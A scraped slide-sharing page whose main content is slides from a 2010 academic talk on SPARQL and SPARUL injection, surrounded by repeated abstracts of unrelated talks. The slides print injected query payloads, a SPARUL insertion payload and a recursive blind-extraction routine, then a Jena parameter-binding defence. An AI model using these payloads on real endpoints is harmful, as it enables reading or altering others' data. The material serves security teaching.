DevSecOps: A Secure SDLC in the Age of DevOps and Hyper-AutomationAlex Senkevitch
Talk from ISSA Wisconsin Chapter Event - Jan 8, 2019:
Abstract:
"How do we emerge with a fully functional, stable, and operationally mature secure SDLC in a software development world where the only thing that is now constant, is change? We will look at how we might keep pace with the DevOps culture without losing our security posture in the process by reviewing what can make up a strong pipeline, what is a pipeline, and how we can interleave all the various security stages we've always relied upon (e.g., software composition analysis, static and dynamic testing, manual testing, etc.) in a tiered SLA-driven flow. Finally, we will talk about how we might achieve the levels of operational maturity we've had previously in our security programs, that must now start over in this new discontinuous world."
Application Security, in Six Parts (HackPra 2012)johnwilander
My (@johnwilander) talk at HackPra 2012, Bochum, Germany. It covers things I've been doing in software and application security the last ten years. Not all of it but the good parts. Enjoy!
Enterprise Java: Just What Is It and the Risks, Threats, and Exposures It PosesAlex Senkevitch
Talk given at ISSA Wisconsin Chapter meeting, Jan 10, 2017.
Abstract:
""Enterprise Java" is a term we hear daily. However, how many of us actually--empirically--know what that represents from a risk, threat, and exposure basis? From the asset(s) it's on and data it accesses to the enterprise at-large that it sits within. This talk will explore the size, scope, and omnipresence of "Enterprise Java" in all its forms; and seek to give it a quantifiable attack surface. This talk will encompass various exemplars of where Enterprise Java appears in the enterprise. From the overt and ubiquitous application servers to the not so overt (but still ubiquitous) use in network appliances and "devices" (IoT) emerging today; and what this means to the threat profiles and attack surfaces of your organization."
Transparencias utilizadas en los Cursillos de Julio de la Universidad de Deusto:
http://www.e-ghost.deusto.es/cursillosjulio/
En Julio de 2009 para el taller de RIAs con Google Web Toolkit.
DevSecOps: A Secure SDLC in the Age of DevOps and Hyper-AutomationAlex Senkevitch
Talk from ISSA Wisconsin Chapter Event - Jan 8, 2019:
Abstract:
"How do we emerge with a fully functional, stable, and operationally mature secure SDLC in a software development world where the only thing that is now constant, is change? We will look at how we might keep pace with the DevOps culture without losing our security posture in the process by reviewing what can make up a strong pipeline, what is a pipeline, and how we can interleave all the various security stages we've always relied upon (e.g., software composition analysis, static and dynamic testing, manual testing, etc.) in a tiered SLA-driven flow. Finally, we will talk about how we might achieve the levels of operational maturity we've had previously in our security programs, that must now start over in this new discontinuous world."
Application Security, in Six Parts (HackPra 2012)johnwilander
My (@johnwilander) talk at HackPra 2012, Bochum, Germany. It covers things I've been doing in software and application security the last ten years. Not all of it but the good parts. Enjoy!
Enterprise Java: Just What Is It and the Risks, Threats, and Exposures It PosesAlex Senkevitch
Talk given at ISSA Wisconsin Chapter meeting, Jan 10, 2017.
Abstract:
""Enterprise Java" is a term we hear daily. However, how many of us actually--empirically--know what that represents from a risk, threat, and exposure basis? From the asset(s) it's on and data it accesses to the enterprise at-large that it sits within. This talk will explore the size, scope, and omnipresence of "Enterprise Java" in all its forms; and seek to give it a quantifiable attack surface. This talk will encompass various exemplars of where Enterprise Java appears in the enterprise. From the overt and ubiquitous application servers to the not so overt (but still ubiquitous) use in network appliances and "devices" (IoT) emerging today; and what this means to the threat profiles and attack surfaces of your organization."
Transparencias utilizadas en los Cursillos de Julio de la Universidad de Deusto:
http://www.e-ghost.deusto.es/cursillosjulio/
En Julio de 2009 para el taller de RIAs con Google Web Toolkit.
Taller de Test Driven Development en la Semana UD de las Ciencias y las Letras 2008 de la Universidad de Deusto ( http://semana.eside.deusto.es ), por el grupo de software libre e-ghost ( http://www.e-ghost.deusto.es )
Mit dem Google Web Toolkit (GWT) kann das Frontend einer Webapplikation bequem in Java entwickelt werden. Für die Steuerung des UIs wird von Google das Model-View-Presenter-Pattern (MVP) empfohlen.
Es schreibt eine strenge Trennung von View und Presenter vor, die zu einer sauberen Gliederung führt und der Testbarkeit dient. Wir zeigen, wie man MVP mit GWT einsetzt und dabei Unit-Tests zur Qualitätssicherung nutzt.
Activities und Places helfen in GWT-Applikationen die Browser-History zu verwenden. Wir zeigen, wie Activities und Places mit MVP zusammen spielen.
GWT wird verwendet um moderne, komplexe Rich Internet Applications zu erstellen. Durch die Generierung von JavaScript aus Java Code können alle Vorteile von Java genützt und gleichzeitig die immer größer werdenden Anforderungen der Web-Benutzer in Bezug auf Style, Performance, Interaktion und Browser-Kompatibilität von Webseiten abgedeckt werden. In dem Vortrag wird GWT vorgestellt und auf dessen Einsatz in der Praxis eingegangen.
This session will show that writing secure code and constructing secure systems is not as hard as it may sound. First, we will briefly dissect some well-known security vulnerabilities which were the result of only minor programming errors and we will demonstrate how easy insecurely written Java code can be exploited. However, writing secure code from the start is just as easy. For this we will present a handful of basic rules and tools every secure Java developer must know. This session will discuss the secure usage of open source libraries and it will present basic security patterns to construct secure system architectures. By the end of this session you will have a higher security awareness and a set of simple tools for your daily work.
The talk was delivered at the JavaOne 2015 in San Francisco. #JavaOne
Taller de Test Driven Development en la Semana UD de las Ciencias y las Letras 2008 de la Universidad de Deusto ( http://semana.eside.deusto.es ), por el grupo de software libre e-ghost ( http://www.e-ghost.deusto.es )
Mit dem Google Web Toolkit (GWT) kann das Frontend einer Webapplikation bequem in Java entwickelt werden. Für die Steuerung des UIs wird von Google das Model-View-Presenter-Pattern (MVP) empfohlen.
Es schreibt eine strenge Trennung von View und Presenter vor, die zu einer sauberen Gliederung führt und der Testbarkeit dient. Wir zeigen, wie man MVP mit GWT einsetzt und dabei Unit-Tests zur Qualitätssicherung nutzt.
Activities und Places helfen in GWT-Applikationen die Browser-History zu verwenden. Wir zeigen, wie Activities und Places mit MVP zusammen spielen.
GWT wird verwendet um moderne, komplexe Rich Internet Applications zu erstellen. Durch die Generierung von JavaScript aus Java Code können alle Vorteile von Java genützt und gleichzeitig die immer größer werdenden Anforderungen der Web-Benutzer in Bezug auf Style, Performance, Interaktion und Browser-Kompatibilität von Webseiten abgedeckt werden. In dem Vortrag wird GWT vorgestellt und auf dessen Einsatz in der Praxis eingegangen.
This session will show that writing secure code and constructing secure systems is not as hard as it may sound. First, we will briefly dissect some well-known security vulnerabilities which were the result of only minor programming errors and we will demonstrate how easy insecurely written Java code can be exploited. However, writing secure code from the start is just as easy. For this we will present a handful of basic rules and tools every secure Java developer must know. This session will discuss the secure usage of open source libraries and it will present basic security patterns to construct secure system architectures. By the end of this session you will have a higher security awareness and a set of simple tools for your daily work.
The talk was delivered at the JavaOne 2015 in San Francisco. #JavaOne
Making DevSecOps a Reality in your Spring ApplicationsHdiv Security
The adoption of DevOps and Continuous Delivery provides tangible benefits such as higher quality, stability, and faster release cadence. One of the most important issues within this adoption is related to security quality tasks that have been traditionally implemented manually.
The talk will demonstrate the security integration of Spring ecosystem demo applications with the Jenkins CI server to jump start continuous and in-depth security testing into the DevOps CI/CD pipeline, via automation and orchestration.
Security from both sides of the fence – a discussion of techniques, such as fuzzing, to reduce the likelihood of an attacker
discovering exploits on smartphones and PCs;
plus a demonstration of approaches hackers may use to weaponize and exploit vulnerabilities.
Similar to Identifying Security Issues in the Semantic Web: Injection attacks in the Semantic Query Languages (20)
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
A tale of scale & speed: How the US Navy is enabling software delivery from l...sonjaschweigert1
Rapid and secure feature delivery is a goal across every application team and every branch of the DoD. The Navy’s DevSecOps platform, Party Barge, has achieved:
- Reduction in onboarding time from 5 weeks to 1 day
- Improved developer experience and productivity through actionable findings and reduction of false positives
- Maintenance of superior security standards and inherent policy enforcement with Authorization to Operate (ATO)
Development teams can ship efficiently and ensure applications are cyber ready for Navy Authorizing Officials (AOs). In this webinar, Sigma Defense and Anchore will give attendees a look behind the scenes and demo secure pipeline automation and security artifacts that speed up application ATO and time to production.
We will cover:
- How to remove silos in DevSecOps
- How to build efficient development pipeline roles and component templates
- How to deliver security artifacts that matter for ATO’s (SBOMs, vulnerability reports, and policy evidence)
- How to streamline operations with automated policy checks on container images
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...SOFTTECHHUB
The choice of an operating system plays a pivotal role in shaping our computing experience. For decades, Microsoft's Windows has dominated the market, offering a familiar and widely adopted platform for personal and professional use. However, as technological advancements continue to push the boundaries of innovation, alternative operating systems have emerged, challenging the status quo and offering users a fresh perspective on computing.
One such alternative that has garnered significant attention and acclaim is Nitrux Linux 3.5.0, a sleek, powerful, and user-friendly Linux distribution that promises to redefine the way we interact with our devices. With its focus on performance, security, and customization, Nitrux Linux presents a compelling case for those seeking to break free from the constraints of proprietary software and embrace the freedom and flexibility of open-source computing.
Unlocking Productivity: Leveraging the Potential of Copilot in Microsoft 365, a presentation by Christoforos Vlachos, Senior Solutions Manager – Modern Workplace, Uni Systems
Climate Impact of Software Testing at Nordic Testing DaysKari Kakkonen
My slides at Nordic Testing Days 6.6.2024
Climate impact / sustainability of software testing discussed on the talk. ICT and testing must carry their part of global responsibility to help with the climat warming. We can minimize the carbon footprint but we can also have a carbon handprint, a positive impact on the climate. Quality characteristics can be added with sustainability, and then measured continuously. Test environments can be used less, and in smaller scale and on demand. Test techniques can be used in optimizing or minimizing number of tests. Test automation can be used to speed up testing.
UiPath Test Automation using UiPath Test Suite series, part 5DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 5. In this session, we will cover CI/CD with devops.
Topics covered:
CI/CD with in UiPath
End-to-end overview of CI/CD pipeline with Azure devops
Speaker:
Lyndsey Byblow, Test Suite Sales Engineer @ UiPath, Inc.
Pushing the limits of ePRTC: 100ns holdover for 100 daysAdtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
Threats to mobile devices are more prevalent and increasing in scope and complexity. Users of mobile devices desire to take full advantage of the features
available on those devices, but many of the features provide convenience and capability but sacrifice security. This best practices guide outlines steps the users can take to better protect personal devices and information.
In his public lecture, Christian Timmerer provides insights into the fascinating history of video streaming, starting from its humble beginnings before YouTube to the groundbreaking technologies that now dominate platforms like Netflix and ORF ON. Timmerer also presents provocative contributions of his own that have significantly influenced the industry. He concludes by looking at future challenges and invites the audience to join in a discussion.
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionAggregage
Join Maher Hanafi, VP of Engineering at Betterworks, in this new session where he'll share a practical framework to transform Gen AI prototypes into impactful products! He'll delve into the complexities of data collection and management, model selection and optimization, and ensuring security, scalability, and responsible use.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
UiPath Test Automation using UiPath Test Suite series, part 4
Identifying Security Issues in the Semantic Web: Injection attacks in the Semantic Query Languages
1. Introduction
Vulnerable code samples
Addressing code injection
Conclusions
Addressing Security Issues in the Semantic Web:
Injection attacks in the Semantic Query Languages
Pablo Ordu˜a, Aitor Almeida, Unai Aguilera, Xabier Laiseca,
n
Diego L´pez-de-Ipi˜a, Aitor G´mez-Goiri
o n o
September 9th, 2010
Future Internet - Elkarlaneko ikerkuntza estrategikorako programa;
ETORTEK 2008 img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
2. Introduction
Introduction
Vulnerable code samples
Query Languages
Addressing code injection
Security issues
Conclusions
Introduction
The Semantic Web is based on a set of technologies:
XML
RDF
OWL
...
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
3. Introduction
Introduction
Vulnerable code samples
Query Languages
Addressing code injection
Security issues
Conclusions
Query Languages
New technologies have been developed to query the ontologies
later later
RDQL − − SPARQL − − SPARUL
−→ −→
These new query languages are based on SQL
RDQL and SPARQL → Read-only query languages
introduces
SPARUL (SPARQL/Update) − − − − modification
− − −→
capabilities
SPARQL Sample:
1 PREFIX injection: <http://www.morelab.deusto.es/
injection.owl#>
2 SELECT ?p1
3 WHERE {
4 ?p1 a injection:Person .
5 } img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
4. Introduction
Introduction
Vulnerable code samples
Query Languages
Addressing code injection
Security issues
Conclusions
Security issues
The use of these new query languages introduce vulnerabilities
already found in a bad use of query languages
Attacks like SQL Injection, LDAP Injection or even XPath
Injection are already well known
Libraries provide tools to sanitize user input in these languages
A proper usage of the query languages is required in order to
face new techniques, including:
(Blind) SPARQL Injection
SPARUL Injection
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
5. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
SPARQL Injection
Introducing SPARQL Injection
The following query is assumed to retrieve the friends of a user
whom fullName is provided by the variable name
The ontology is available in
http://www.morelab.deusto.es/injection.owl
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
7. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
SPARQL Injection
Introducing SPARQL Injection
This code can be exploited to retrieve any information in the
ontology
The problem is that the variable name has not been sanitized
This variable can include SPARQL code, and thus modify the
query itself
A variable with malicious content can be found in the next
slide
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
8. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
Appending the Strings
1 String queryString =
2 "PREFIX injection: <http://www.morelab.deusto.es
/injection.owl#> " +
3 "SELECT ?name1 ?name2 WHERE {" +
4 " ?p1 a injection:Person . " +
5 " ?p2 a injection:Person . " +
6 " ?p1 injection:fullName ’" + name + "’ . " +
7 " ?p1 injection:isFriendOf ?p2 . " +
8 " ?p1 injection:fullName ?name1 . " +
9 " ?p2 injection:fullName ?name2 . " +
10 "}";
11 String name = "Pablo Orduna’ . " +
12 "?b1 a injection:Building . " +
13 "?b1 injection:name ?name1 . " +
14 "} #";
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
10. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
The final query
1 String queryString =
2 "PREFIX injection: <http://www.morelab.deusto.es
/injection.owl#> " +
3 "SELECT ?name1 ?name2 WHERE {" +
4 " ?p1 a injection:Person . " +
5 " ?p2 a injection:Person . " +
6 " ?p1 injection:fullName ’Pablo Orduna’ . " +
7 " ?b1 a injection:Building . " +
8 " ?b1 injection:name ?name1 . " +
9 " } #" + /* From this point everything
10 is commented and thus ignored */ "’ . " +
11 " ?p1 injection:isFriendOf ?p2 . " +
12 " ?p1 injection:fullName ?name1 . " +
13 " ?p2 injection:fullName ?name2 . " +
14 "}";
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
11. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
SPARQL Injection
This code will return the name of the building instead of the
name of a user
It is possible to use the flexibility of SPARQL to perform other
kind of queries retrieving any information in the ontology
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
12. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
Blind SPARQL Injection
Introducing Blind SPARQL Injection
The previous sample was especially vulnerable since it returned
a string
It is possible to retrieve any information as a string
Strings are usually not retrieved in SPARQL, but individuals
What if the returning value is an individual?
It’s still possible to retrieve any information
If it’s possible to know if a given query is true or false, it’s
possible to iteratively retrieve any information
The following code retrieves the individuals themselves
It’s possible to know if the query provided or not the
individuals
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
14. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
Blind SPARQL Injection
Once again, the variable name has not been sanitized
So it’s still possible to inject SPARQL code
The injected code can’t return a building or the building name
But, adding a condition like “does the building name start by
this letter” we will get:
The common results → so the building name starts by that
letter
No results → so the building name does not start by that
letter
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
16. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
The final query would be. . .
1 "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#>
" +
2 "PREFIX injection: <http://www.morelab.deusto.es
/injection.owl#> " +
3 "SELECT ?p1 ?p2 WHERE {" +
4 " ?p1 a injection:Person . " +
5 " ?p2 a injection:Person . " +
6 " ?p1 injection:fullName ’Pablo Orduna’ . " +
7 " ?b1 a injection:Building . " +
8 " ?b1 injection:name ?buildingName . " +
9 " FILTER regex(?buildingName, "ˆ" + s + ".*")
. " +
10 " } #" + /* from here ignored*/ "’ˆˆxsd:string .
" +
11 " ?p1 injection:isFriendOf ?p2 . }";
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
17. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
Querying recursively. . .
1 public static String recursively(String letters)
throws Exception{
2 for(int i = 0; i < POSSIBLE_LETTERS.length(); ++
i){
3 char c = POSSIBLE_LETTERS.charAt(i);
4 if(tryBlind(letters + c)){
5 System.out.println(c);
6 return "" + c + recursively(letters + c);
7 }
8 }
9 return "";
10 }
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
18. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
Blind SPARQL Injection
It is possible to optimize this system using binary search
Performing queries using Regular Expressions like ˆ[A-M].*
to know if the char is between the char A and M
Given a charset of length 64, we would reduce the number of
iterations from 64 times 10 (640) to 6 times 10 (60)
Using the whole UTF-16 charset, it would reduce the number
of iterations from 65536 times 10 (655360) to 16 times 10
(160)
The point is that it’s possible to retrieve any information in
the ontology independently from the values returned by the
query
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
19. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
SPARUL Injection
Introducing SPARQL/Update Injection
All the previous examples are executed in read-only query
languages
SPARUL introduces the chance to modify the ontology
INSERT, MODIFY and DELETE statements are available
The following sample modifies the fullName of the resource
injection:Pablo, setting it to the value of the variable name
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
21. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
SPARUL Injection
1 String name = "Pablo Ordunya’ˆˆxsd:string" +
2 "} n " +
3 "INSERT {" +
4 " injection:Pablo injection:isFriendOf
injection:EvilMonkey" +
5 "} #"; // }:-D
6 String result = sample.run(name);
With this vulnerability, it is possible to modify the whole
ontology.
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
22. Introduction
Vulnerable code samples
Introduction
Addressing code injection
Conclusions
Addressing code injection
Mechanisms provided by the library must be used (if provided)
Not as simple as scaping the ’ characters: the string u0027 is
a simple quote, just as in Java
1 System.out.println("au0022.length() +
u0022b".length());
2 // This code prints "2", the result of
("a".length() + "b".length())
3 // since u0022 will be replaced by "
even if it is commented or inside
4 // String
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
23. Introduction
Vulnerable code samples
Introduction
Addressing code injection
Conclusions
Frameworks
In Jena, the initialBinding argument can be used in the
QueryExecutionFactory
1 // initial binding
2 QuerySolutionMap initialBinding = new
QuerySolutionMap();
3 RDFNode parameterizedName = model.createLiteral(
name);
4 initialSetting.add("thename", parameterizedName);
5
6 // Perform the query
7 Query query = QueryFactory.create(queryString);
8 QueryExecution qe = QueryExecutionFactory.create(
query, model, initialBinding);
9 ResultSet results = qe.execSelect();
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
24. Introduction
Vulnerable code samples
Addressing code injection
Conclusions
Conclusions
Not sanitizing the user input might add a set of security
vulnerabilities in our systems
In the paper it is presented how new query languages inherit
security issues present in older query languages, and therefore
they should also be taken into account when working with
them
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
25. Introduction
Vulnerable code samples
Addressing code injection
Conclusions
Questions?
DeustoTech - Internet
http://www.morelab.deusto.es
Pablo Ordu˜an pablo.orduna@deusto.es
Aitor Almeida aitor.almeida@deusto.es
Unai Aguilera unai.aguilera@deusto.es
Xabier Laiseca xabier.laiseca@deusto.es
Diego L´pez-de-Ipi˜a
o n dipina@deusto.es
Aitor G´mez-Goiri
o aitor.gomez@deusto.es
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .